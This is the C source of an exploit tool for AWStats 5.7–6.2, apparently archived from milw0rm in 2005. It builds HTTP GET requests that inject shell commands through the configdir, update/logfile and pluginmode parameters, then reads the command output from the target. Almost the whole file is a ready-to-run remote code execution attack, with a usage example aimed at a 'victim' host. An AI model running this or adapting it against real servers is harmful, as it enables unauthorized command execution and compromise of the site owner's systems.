/**************************************************** * * * AWStats v5.7 - v6.2 * * * * sileAWSxpl * * This exploit utilize three methods for exploiter * * the vulnerability found on AWStats software. * * an user can execute remote code on vulnerable * * machine, with httpd privileges. * * * * References: www.securityfocus.org/bid/12543 * * * * coded by: Silentium of Anacron Group Italy * * date: 24/02/2005 * * e-mail: anacrongroupitaly[at]autistici[dot]org * * my_home: www.autistici.org/anacron-group-italy * * * * this tool is developed under GPL license * * no(c) .:. copyleft * * * ****************************************************/ #include #include #include #include #include #include #include #define PORT 80 // port of the web server #define CMDB 512 // buffer length for commands #define BUFF 6000 // buffer length for output's commands #define BANSTART "SILENTIUM" #define BANSTOP "anacron_group_italy" void info(void); void sendxpl(FILE *out, char *argv[], int type); void readout(int sock, char *argv[]); void errgeth(void); void errsock(void); void errconn(void); void errsplo(void); void errbuff(void); int main(int argc, char *argv[]){ FILE *out; int sock, sockconn, type; struct sockaddr_in addr; struct hostent *hp; if(argc != 5) info(); type = atoi(argv[4]); if(type < 0 || type > 3) info(); if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) errsock(); system("clear"); printf("[*] Creating socket [OK]\n"); if((hp = gethostbyname(argv[1])) == NULL) errgeth(); printf("[*] Resolving victim host [OK]\n"); memset(&addr,0,sizeof(addr)); memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length); addr.sin_family = AF_INET; addr.sin_port = htons(PORT); sockconn = connect(sock, (struct sockaddr *)&addr, sizeof(addr)); if(sockconn < 0) errconn(); printf("[*] Connecting at victim host [OK]\n",argv[1]); out = fdopen(sock,"a"); setbuf(out,NULL); sendxpl(out, argv, type); printf("[*] Sending exploit [OK]\n"); readout(sock, argv); shutdown(sock, 2); close(sock); fclose(out); return(0); } void info(void){ system("clear"); printf("#########################################\n" "# AWStats v5.7 - v6.2 #\n" "# Remote Code Execution #\n" "# exploit coded by Silentium #\n" "# Anacron Group Italy #\n" "# www.autistici.org/anacron-group-italy #\n" "#########################################\n\n" "[Usage]\n\n" " sileAWSxpl \n\n" " [Type]\n" " 1) ?configdir=|cmd|\n" " 2) ?update=1&logfile=|cmd|\n" " 3) ?pluginmode=:system(\"cmd\");\n\n" "[example]\n\n" " sileAWSxpl www.victim.com /cgi-bin/awstats.pl \"uname -a\" 3\n\n"); exit(1); } void sendxpl(FILE *out, char *argv[], int type){ char cmd[CMDB], cmd2[CMDB*3], cc; char *hex = "0123456789abcdef"; int i, j = 0, size; size = strlen(argv[3]); strncpy(cmd,argv[3],size); /*** Url Encoding Mode ON ***/ for(i = 0; i < size; i++){ cc = cmd[i]; if(cc >= 'a' && cc <= 'z' || cc >= 'A' && cc <= 'Z' || cc >= '0' && cc <= '9' || cc == '-' || cc == '_' || cc == '.') cmd2[j++] = cc ; else{ cmd2[j++] = '%'; cmd2[j++] = hex[cc >> 4]; cmd2[j++] = hex[cc & 0x0f]; } } cmd2[j] = '\0'; /*** Url Encoding Mode OFF ;P ***/ if(type==1) fprintf(out,"GET %s?configdir=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n" "Connection: Keep-Alive\n" "Accept: text/html, image/jpeg, image/png, text/*, image/*,*/*\n" "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n" "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n" "Accept-Language: en\n" "Host: %s\n\n",argv[2],BANSTART,cmd2,BANSTOP,argv[1]); else if(type==2) fprintf(out,"GET %s?update=1&logfile=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n" "Connection: Keep-Alive\n" "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n" "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n" "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n" "Accept-Language: en\n" "Host: %s\n\n",argv[2],BANSTART,cmd2,BANSTOP,argv[1]); else if(type==3) fprintf(out,"GET %s?pluginmode=:system(\"echo+%s;%s;echo+%s\"); HTTP/1.0\n" "Connection: Keep-Alive\n" "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n" "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n" "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n" "Accept-Language: en\n" "Host: %s\n\n",argv[2],BANSTART,cmd2,BANSTOP,argv[1]); } void readout(int sock, char *argv[]){ int i=0, flag; char output[BUFF], tmp; printf("[*] Output by %s:\n\n",argv[1]); while(strstr(output,BANSTART) == NULL){ flag = read(sock,&tmp,1); output[i++] = tmp; if(i >= BUFF) errbuff(); if(flag==0) errsplo(); } while(strstr(output,BANSTOP) == NULL){ read(sock,&tmp,1); output[i++] = tmp; putchar(tmp); if(i >= BUFF) errbuff(); } printf("\n\n"); } void errsock(void){ system("clear"); printf("[x] Creating socket [FAILED]\n\n"); exit(1); } void errgeth(void){ printf("[x] Resolving victim host [FAILED]\n\n"); exit(1); } void errconn(void){ printf("[x] Connecting at victim host [FAILED]\n\n"); exit(1); } void errsplo(void){ printf("[x] Exploiting victim host [FAILED]\n\n"); exit(1); } void errbuff(void){ printf("[x] Your buffer for output's command is FULL !!!\n\n"); exit(1); } // milw0rm.com [2005-02-24]